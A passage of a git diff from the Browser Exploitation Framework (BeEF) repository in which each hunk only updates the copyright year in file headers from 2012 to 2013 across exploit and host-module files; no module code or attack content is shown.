 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/exploits/xss/cisco_collaboration_server_5_xss/config.yaml b/modules/exploits/xss/cisco_collaboration_server_5_xss/config.yaml
index 8ad1a6ccc..b93a2c26b 100644
--- a/modules/exploits/xss/cisco_collaboration_server_5_xss/config.yaml
+++ b/modules/exploits/xss/cisco_collaboration_server_5_xss/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb b/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb
index 75b55ba40..5d1921f58 100644
--- a/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb
+++ b/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/xss/serendipity_1.6_xss/command.js b/modules/exploits/xss/serendipity_1.6_xss/command.js
index 71c8bf1c4..c919b9bb6 100644
--- a/modules/exploits/xss/serendipity_1.6_xss/command.js
+++ b/modules/exploits/xss/serendipity_1.6_xss/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/exploits/xss/serendipity_1.6_xss/config.yaml b/modules/exploits/xss/serendipity_1.6_xss/config.yaml
index 472bab376..c386055cc 100644
--- a/modules/exploits/xss/serendipity_1.6_xss/config.yaml
+++ b/modules/exploits/xss/serendipity_1.6_xss/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/xss/serendipity_1.6_xss/module.rb b/modules/exploits/xss/serendipity_1.6_xss/module.rb
index fd4b1afdc..a413e5b13 100644
--- a/modules/exploits/xss/serendipity_1.6_xss/module.rb
+++ b/modules/exploits/xss/serendipity_1.6_xss/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/zenoss_3x_command_execution/command.js b/modules/exploits/zenoss_3x_command_execution/command.js
index 087133372..608c4e23e 100644
--- a/modules/exploits/zenoss_3x_command_execution/command.js
+++ b/modules/exploits/zenoss_3x_command_execution/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/exploits/zenoss_3x_command_execution/config.yaml b/modules/exploits/zenoss_3x_command_execution/config.yaml
index 5786425da..d58269969 100644
--- a/modules/exploits/zenoss_3x_command_execution/config.yaml
+++ b/modules/exploits/zenoss_3x_command_execution/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/zenoss_3x_command_execution/module.rb b/modules/exploits/zenoss_3x_command_execution/module.rb
index c79f60193..5511d5b43 100644
--- a/modules/exploits/zenoss_3x_command_execution/module.rb
+++ b/modules/exploits/zenoss_3x_command_execution/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/zenoss_add_user_csrf/command.js b/modules/exploits/zenoss_add_user_csrf/command.js
index 8727f8bc8..474557d8d 100644
--- a/modules/exploits/zenoss_add_user_csrf/command.js
+++ b/modules/exploits/zenoss_add_user_csrf/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/exploits/zenoss_add_user_csrf/config.yaml b/modules/exploits/zenoss_add_user_csrf/config.yaml
index 458e0c701..bcb3ea9aa 100644
--- a/modules/exploits/zenoss_add_user_csrf/config.yaml
+++ b/modules/exploits/zenoss_add_user_csrf/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/zenoss_add_user_csrf/module.rb b/modules/exploits/zenoss_add_user_csrf/module.rb
index 37eee8336..717d0cdd8 100644
--- a/modules/exploits/zenoss_add_user_csrf/module.rb
+++ b/modules/exploits/zenoss_add_user_csrf/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/zenoss_daemon_csrf/command.js b/modules/exploits/zenoss_daemon_csrf/command.js
index 0ef85cdce..7b90a1a88 100644
--- a/modules/exploits/zenoss_daemon_csrf/command.js
+++ b/modules/exploits/zenoss_daemon_csrf/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/exploits/zenoss_daemon_csrf/config.yaml b/modules/exploits/zenoss_daemon_csrf/config.yaml
index d3871c1d6..c93db9f5b 100644
--- a/modules/exploits/zenoss_daemon_csrf/config.yaml
+++ b/modules/exploits/zenoss_daemon_csrf/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/zenoss_daemon_csrf/module.rb b/modules/exploits/zenoss_daemon_csrf/module.rb
index d0e9c9693..eb9c642e1 100644
--- a/modules/exploits/zenoss_daemon_csrf/module.rb
+++ b/modules/exploits/zenoss_daemon_csrf/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/host/clipboard_theft/command.js b/modules/host/clipboard_theft/command.js
index 1f4db5740..aab376979 100644
--- a/modules/host/clipboard_theft/command.js
+++ b/modules/host/clipboard_theft/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/host/clipboard_theft/config.yaml b/modules/host/clipboard_theft/config.yaml
index b0f618fce..00808de40 100644
--- a/modules/host/clipboard_theft/config.yaml
+++ b/modules/host/clipboard_theft/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/host/clipboard_theft/module.rb b/modules/host/clipboard_theft/module.rb
index daa5e6ac5..1fb46fe28 100644
--- a/modules/host/clipboard_theft/module.rb
+++ b/modules/host/clipboard_theft/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/host/detect_cups/command.js b/modules/host/detect_cups/command.js
index a2608dc7d..ce2c440cb 100644
--- a/modules/host/detect_cups/command.js
+++ b/modules/host/detect_cups/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/host/detect_cups/config.yaml b/modules/host/detect_cups/config.yaml
index 0658974e6..a50398823 100644
--- a/modules/host/detect_cups/config.yaml
+++ b/modules/host/detect_cups/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/host/detect_cups/module.rb b/modules/host/detect_cups/module.rb
index fef9a3fc1..2e3a87769 100644
--- a/modules/host/detect_cups/module.rb
+++ b/modules/host/detect_cups/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/host/detect_google_desktop/command.js b/modules/host/detect_google_desktop/command.js
index c1749d5bb..2a22e8f3b 100644
--- a/modules/host/detect_google_desktop/command.js
+++ b/modules/host/detect_google_desktop/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/host/detect_google_desktop/config.yaml b/modules/host/detect_google_desktop/config.yaml
index b3d42e577..5f4a721e9 100644
--- a/modules/host/detect_google_desktop/config.yaml
+++ b/modules/host/detect_google_desktop/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/host/detect_google_desktop/module.rb b/modules/host/detect_google_desktop/module.rb
index 949466bb9..178784cb2 100644
--- a/modules/host/detect_google_desktop/module.rb
+++ b/modules/host/detect_google_desktop/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/host/detect_protocol_handlers/command.js b/modules/host/detect_protocol_handlers/command.js
index b9c2c76bc..e1a52f4a4 100644
--- a/modules/host/detect_protocol_handlers/command.js
+++ b/modules/host/detect_protocol_handlers/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/host/detect_protocol_handlers/config.yaml b/modules/host/detect_protocol_handlers/config.yaml
index 60ec6d67d..221723dd7 100644
--- a/modules/host/detect_protocol_handlers/config.yaml
+++ b/modules/host/detect_protocol_handlers/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/host/detect_protocol_handlers/module.rb b/modules/host/detect_protocol_handlers/module.rb
index df7b205ff..a9041d1d0 100644
--- a/modules/host/detect_protocol_handlers/module.rb
+++ b/modules/host/detect_protocol_handlers/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/host/detect_software/command.js b/modules/host/detect_software/command.js
index 4ef214605..4a14e28ed 100644
--- a/modules/host/detect_software/command.js
+++ b/modules/host/detect_software/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/host/detect_software/config.yaml b/modules/host/detect_software/config.yaml
index 7c44db54a..90ff29f0d 100644
--- a/modules/host/detect_software/config.yaml
+++ b/modules/host/detect_software/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/host/detect_software/module.rb b/modules/host/detect_software/module.rb
index b35f81c24..e1a0a2e9a 100644
--- a/modules/host/detect_software/module.rb
+++ b/modules/host/detect_software/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/host/detect_vm/command.js b/modules/host/detect_vm/command.js
index a22df9951..46cf44587 100644
--- a/modules/host/detect_vm/command.js
+++ b/modules/host/detect_vm/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/host/detect_vm/config.yaml b/modules/host/detect_vm/config.yaml
index 8ee182664..3ed890562 100644
--- a/modules/host/detect_vm/config.yaml
+++ b/modules/host/detect_vm/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/host/detect_vm/module.rb b/modules/host/detect_vm/module.rb
index 0ed2c01e3..590de2f66 100644
--- a/modules/host/detect_vm/module.rb
+++ b/modules/host/detect_vm/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/host/get_internal_ip/command.js b/modules/host/get_internal_ip/command.js
index 575322055..165dc1c4a 100755
--- a/modules/host/get_internal_ip/command.js
+++ b/modules/host/get_internal_ip/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/host/get_internal_ip/config.yaml b/modules/host/get_internal_ip/config.yaml
index 9cb6d2072..19f6a8175 100755
--- a/modules/host/get_internal_ip/config.yaml
+++ b/modules/host/get_internal_ip/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/host/get_internal_ip/get_internal_ip.java b/modules/host/get_internal_ip/get_internal_ip.java
index f783260a3..38a0589b5 100755
--- a/modules/host/get_internal_ip/get_internal_ip.java
+++ b/modules/host/get_internal_ip/get_internal_ip.java
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
  * Browser Exploitation Framework (BeEF) - http://beefproject.com
  * See the file 'doc/COPYING' for copying permission
  */
diff --git a/modules/host/get_internal_ip/module.rb b/modules/host/get_internal_ip/module.rb
index 5f6948506..37c8f9407 100755
--- a/modules/host/get_internal_ip/module.rb
+++ b/modules/host/get_internal_ip/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/host/get_physical_location/command.js b/modules/host/get_physical_location/command.js
index 4047325e3..05d1c07a7 100755
--- a/modules/host/get_physical_location/command.js
+++ b/modules/host/get_physical_location/command.js
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
  * Browser Exploitation Framework (BeEF) - http://beefproject.com
  * See the file 'doc/COPYING' for copying permission
  */
diff --git a/modules/host/get_physical_location/config.yaml b/modules/host/get_physical_location/config.yaml
index 49f7b48b2..6c993b22a 100755
--- a/modules/host/get_physical_location/config.yaml
+++ b/modules/host/get_physical_location/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/host/get_physical_location/getGPSLocation.java b/modules/host/get_physical_location/getGPSLocation.java
index 8491a7895..3b9cb3178 100755
--- a/modules/host/get_physical_location/getGPSLocation.java
+++ b/modules/host/get_physical_location/getGPSLocation.java
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
  * Browser Exploitation Framework (BeEF) - http://beefproject.com
  * See the file 'doc/COPYING' for copying permission
  */
diff --git a/modules/host/get_physical_location/module.rb b/modules/host/get_physical_location/module.rb
index 7136a52e4..6b23e165d 100755
--- a/modules/host/get_physical_location/module.rb
+++ b/modules/host/get_physical_location/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/host/get_registry_keys/command.js b/modules/host/get_registry_keys/command.js
index c0bb9377d..dfe782faa 100644
--- a/modules/host/get_registry_keys/command.js
+++ b/modules/host/get_registry_keys/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/host/get_registry_keys/config.yaml b/modules/host/get_registry_keys/config.yaml
index 9d0ef23a4..bb9a9554d 100644
--- a/modules/host/get_registry_keys/config.yaml
+++ b/modules/host/get_registry_keys/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/host/get_registry_keys/module.rb b/modules/host/get_registry_keys/module.rb
index f8a530b52..40fc5a324 100644
--- a/modules/host/get_registry_keys/module.rb
+++ b/modules/host/get_registry_keys/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/host/get_system_info/command.js b/modules/host/get_system_info/command.js
index 6e8f6c1bd..5c8afad87 100644
--- a/modules/host/get_system_info/command.js
+++ b/modules/host/get_system_info/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/host/get_system_info/config.yaml b/modules/host/get_system_info/config.yaml
index 1c7c1ca21..6a05dd9ec 100644
--- a/modules/host/get_system_info/config.yaml
+++ b/modules/host/get_system_info/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/host/get_system_info/getSystemInfo.java b/modules/host/get_system_info/getSystemInfo.java
index 1d07209f2..2c912cc76 100644
--- a/modules/host/get_system_info/getSystemInfo.java
+++ b/modules/host/get_system_info/getSystemInfo.java
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
  * Browser Exploitation Framework (BeEF) - http://beefproject.com
  * See the file 'doc/COPYING' for copying permission
  */
diff --git a/modules/host/get_system_info/module.rb b/modules/host/get_system_info/module.rb
index 2511eedc6..d6057375a 100644
--- a/modules/host/get_system_info/module.rb
+++ b/modules/host/get_system_info/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/host/get_wireless_keys/command.js b/modules/host/get_wireless_keys/command.js
index 350d70552..f40859427 100644
--- a/modules/host/get_wireless_keys/command.js
+++ b/modules/host/get_wireless_keys/command.js
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
  * Browser Exploitation Framework (BeEF) - http://beefproject.com
  * See the file 'doc/COPYING' for copying permission
  */
diff --git a/modules/host/get_wireless_keys/config.yaml b/modules/host/get_wireless_keys/config.yaml
index 834c47a50..accab8546 100644
--- a/modules/host/get_wireless_keys/config.yaml
+++ b/modules/host/get_wireless_keys/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/host/get_wireless_keys/module.rb b/modules/host/get_wireless_keys/module.rb
index 73bbe20b6..30344837a 100644
--- a/modules/host/get_wireless_keys/module.rb
+++ b/modules/host/get_wireless_keys/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/host/get_wireless_keys/wirelessZeroConfig.java b/modules/host/get_wireless_keys/wirelessZeroConfig.java
index 5e05365dd..627a7db8c 100644
--- a/modules/host/get_wireless_keys/wirelessZeroConfig.java
+++ b/modules/host/get_wireless_keys/wirelessZeroConfig.java
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
  * Browser Exploitation Framework (BeEF) - http://beefproject.com
  * See the file 'doc/COPYING' for copying permission
  */
diff --git a/modules/host/hook_default_browser/command.js b/modules/host/hook_default_browser/command.js
index e765a693a..ba4e65dbe 100644
--- a/modules/host/hook_default_browser/command.js
+++ b/modules/host/hook_default_browser/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/host/hook_default_browser/config.yaml b/modules/host/hook_default_browser/config.yaml
index 7d5bd425f..e5550c11c 100644
--- a/modules/host/hook_default_browser/config.yaml
+++ b/modules/host/hook_default_browser/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/host/hook_default_browser/module.rb b/modules/host/hook_default_browser/module.rb
index e5ea146af..dbbca47d1 100644
--- a/modules/host/hook_default_browser/module.rb
+++ b/modules/host/hook_default_browser/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/host/insecure_url_skype/command.js b/modules/host/insecure_url_skype/command.js
index 8e3df94e6..3d44fbe33 100644
--- a/modules/host/insecure_url_skype/command.js
+++ b/modules/host/insecure_url_skype/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/host/insecure_url_skype/config.yaml b/modules/host/insecure_url_skype/config.yaml
index a3a3eb9f2..93573e876 100644
--- a/modules/host/insecure_url_skype/config.yaml
+++ b/modules/host/insecure_url_skype/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/host/insecure_url_skype/module.rb b/modules/host/insecure_url_skype/module.rb
index 11e364837..2098e45d2 100644
--- a/modules/host/insecure_url_skype/module.rb
+++ b/modules/host/insecure_url_skype/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/host/iphone_tel/command.js b/modules/host/iphone_tel/command.js
index 63509f310..f52d271e8 100644
--- a/modules/host/iphone_tel/command.js
+++ b/modules/host/iphone_tel/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
